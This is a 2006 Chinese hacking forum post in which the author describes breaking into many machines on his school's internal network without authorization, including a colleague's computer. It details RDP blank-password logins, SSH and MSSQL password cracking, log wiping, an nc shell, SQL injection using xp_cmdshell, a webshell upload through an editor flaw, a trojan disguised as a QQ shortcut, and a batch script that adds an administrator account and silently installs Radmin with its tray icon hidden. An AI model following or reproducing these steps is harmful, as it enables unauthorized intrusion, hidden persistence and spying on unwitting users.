黑色海岸线论坛 - Powered by Discuz! Board

标题: [分享][推荐]内网肉鸡大追捕 [打印本页]

作者: 痴心的鱼 时间: 2006-1-28 12:52 标题: [分享][推荐]内网肉鸡大追捕

首先，我先介绍一下我所处的环境．本人所在的是一个非工科院校工作，这边的安全意思比较薄弱，这给我提供了很大的发展肉鸡的空间．　　接着介绍一下，这里的网络　　这边的网络地址分为两类：分别是　　１７２．１８．Ａ．＊（Ａ小于１０的基本上学校的服务器，其他属于教学办公的机器）　　１７２．１６．＊．＊（属于学生公寓的机器）　　不同的楼层之间做了,端口过滤，如１３９，４４５这些敏感的端口全部被过滤了，这个对想抓肉鸡的人是个不小的打击．　　言归正传，现在开始追捕行动．１．３３８９空口令　　考虑到现在很多机器都是用xp的，很多机器都是开着３３８９的，虽然打过补丁的机器都无法用空口令登陆，但是还是有部分可以使用的．　　对教学区和公寓分别实施两套策略　　教学区机器在线率最高的是在中午的时候，而学生公寓区往往在晚上１０点半左右．在这个时候我会打开xscan，填上３３８９端口，自己先去喝杯茶，到别的地方侃两下．　扫描结束后，把主机列表成一个文件．这样分别进行两次，已经有大量的肉鸡后选名单了．接下来制定登陆的策略．　　教学办公区这边选一个一般是吃饭的时间，然后用administrator空口令登陆　　学生公寓区是在中午吃饭的时间和下午上课以后，有学生会选择在这段时间挂机的．　　发现，有不少机器可以用空口令登陆的．教师这边机器能登陆的机器不多，因为补丁都打上了，尽管有很多空口令的，也只能放弃了．学生那么虽然可以登陆的不少，他们基本上都在操作中，无法下手，遇到运气到家时候，赶紧用administrator或当前帐户登陆，开启telnet 　接着，哈哈.... 　　经过这短时间的搜捕，共积累６只肉鸡左右，当然，我完全可以通过这种手段扩大肉鸡，但是这种实在是太重复单调了．　２．ssh 　学校的路由器和交换机都有acl控制的，想通过他们渗透是不行的．所以２３端口，我基本上都不扫描．所以就把ssh端口扫描了一下，很快发现了一台ssh密码为１２３４５的linux主机，马上用ssh登陆器上去，开后门，除日志，呵呵，这是我唯一一台linux肉鸡．呵呵,想起无间道里面的一句话,撑哥,他是我唯一的小弟　３．通过已经获得的肉鸡进行扩大战果　首先想通过在肉鸡上安装sniffer，感觉太麻烦，而且容易被发现，怎么办了顺便说一下，有一次，好象被发现了　那次我开了telnet和radmin的　那个家伙关掉telnet，然后把硬盘除c盘以外的一个一个的格了，我在用radmin看着他干完．试试ipc，很古董的东西了，呵呵　首先，扫描目标网段存活的机器，然后生成列表　然后，自己作个小程序　生成以下形式的bat文件　echo >>c:\windows\log1.txt　 net use \\ip\admin$ "" /user :administrator　　>>c:\windows\log1.txt 在目标机器上执行事实上，这种方法成功率并不高　通过这种方法，我也只捕获两只肉鸡．４．ccproxy 　我发现学校里面还有些机器是在用这个服务程序上网的，好telnet　上去看看服务程序版本，６．x，看来不能做溢出了．但是可以做远程执行exe 　到黑基上down一个ccpropingxp，执行后，目标会到网络上下一个exe并执行，搞定了吧．碰到有些机器开启了xp自带的放火墙的还要编程修改注册表里面相应的参数，exe遍好后，放到网络上，接着，嘿嘿搞定两台后，转战别的方向．５．mssql弱口令还是用xcsan，居然一下发现两台，一台居然是学校某部门服务器群里面的一台，还开了３３８９，二话不说拿下，看看是２０００的，用findpass找出口令，用工程学的原理．尝试登陆该群里面的其他机器，ok，一下子爆出５台机器．爽透了．另外一台机器也是两千的，装的是norton杀毒的，上传nc，拿回一个shell，为所欲为吧，哈哈．看来有所作为，挂上强一点的字典，ok对扫描到开１４３３的机器进行爆破．爆出一台是学校的服务器的，晕到，禁地，但是还要试试用sql利用工具连上，dos命令，错误,正常，看来xp＿cmdshell被删了恢复，还是不行看看他还开了什么端口，radmin 哦也删除radmin那几个键就可以自己登陆了，哈哈还是用sql利用工具连上，注册表管理，晕，读到radmin子键的时候出错．算了，用自己的mssql服务器直接连上去，调出mssql，查询分析器，噼里啪啦，打进代码，访问被拒绝，看看sa的权限，sysadmin，看来sa与系统权限分离了．还是尝试倍份数据库为asp吧找到网站目录，倍份asp ６，同个楼层的渗透．（１）同一个楼层是没有做端口过滤的，呵呵　首先，找到ip的范围，接着在xcsan里面狂扫一通，ok，先去晒晒太阳．回来一看，好家伙两台肉鸡，搞定，装上radmin，日志不打扫了，８８走人．　下午的时候，办公室的同事突然拉住我说，指着电脑说，这个图标是什么东东　晕倒，原来同事成了我的肉鸡，radmin忘了禁止掉图标，赶紧清理，呵呵．为时已晚，同事第二天就上了防火墙，呵呵．（２）smbcrack 对象当然是win2000了先用xcan扫描，用superdic生成字典,接着挂上字典，搞定２台． (3) 扫描共享 xscan 扫描晕,有桌面共享的 have a look 有word,excel,嘿嘿下手的地方不少,为了不妨碍办公,还是决定不在word做手脚 qq快捷方式,嘿嘿,查看xscan扫描出来的信息大致能判断出当前的用户的信息直接写一个程序,用qq的图标,编译好后放入桌面的一个文件夹里面,位置要隐蔽,狸猫唤太子,嘿嘿,替换了qq的快捷方式程序功能为开3389,建立帐户,够了吧然后通过查看qq的快捷方式我知道qq在####位置里面所以,我的程序最后会启动qq, 嘿嘿７．考试系统的渗透学校里面很多部门用一个考试系统，这个系统自带了一个appache和mysql 嘿嘿，要是知道mysql的密码，那么.... 到网上down了一个程序下来，研究.......，嘿嘿８．sql　inject 打开xscan，添如８０端口，闭上眼睛休息一下．找到n多机器，凭着经验，打开一个学校网站，打开一个网页，在网址后面加上';出错，加上　and　１＝１成功，ok 马上打开小明子查看一下，是mssql的呵呵但是mssql的端口为什么没有扫描到呢,看来在防火墙上做过滤了学校的服务器还是有点不一样我尝试着搜索xp＿cmdshell是否存在，ok，看到了接着添加用户，嘿嘿，还开了３３８９的,感激中..... ９．网页上传看到一台机器，居然可以浏览web文件夹的于是大肆搜索一翻，看到了nb文章系统，版本还比较新，进入后台没什么用的．不是有NB文章系统Fck_editor的漏洞利用上传海洋远端木马上传radmin 自己又制作了一个bat net user iuser_sql /add ％％％％ net localgroup administrators iuser_sql /add r_server /install /silence r_server /pass:％％％％ /save /silence reg add HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters /v DisableTrayIcon /t REG_BINARY /d 01000000 net start r_server 然后做一个小程序，无声无息的启动这个bat，放入启动项目，嘿嘿１０．溢出很遗憾，没有成功溢出过什么东东但是失败的例子也很多，在这里，就不说了，呵呵希望以上的小菜思路，对和我一样的菜鸟有些帮助

作者: 孤独飞雪 时间: 2006-2-18 11:50 标题: [分享][推荐]内网肉鸡大追捕

我晕的了，内网抓鸡最简单不过了，嘿嘿

欢迎光临黑色海岸线论坛 (http://bbs.thysea.com/)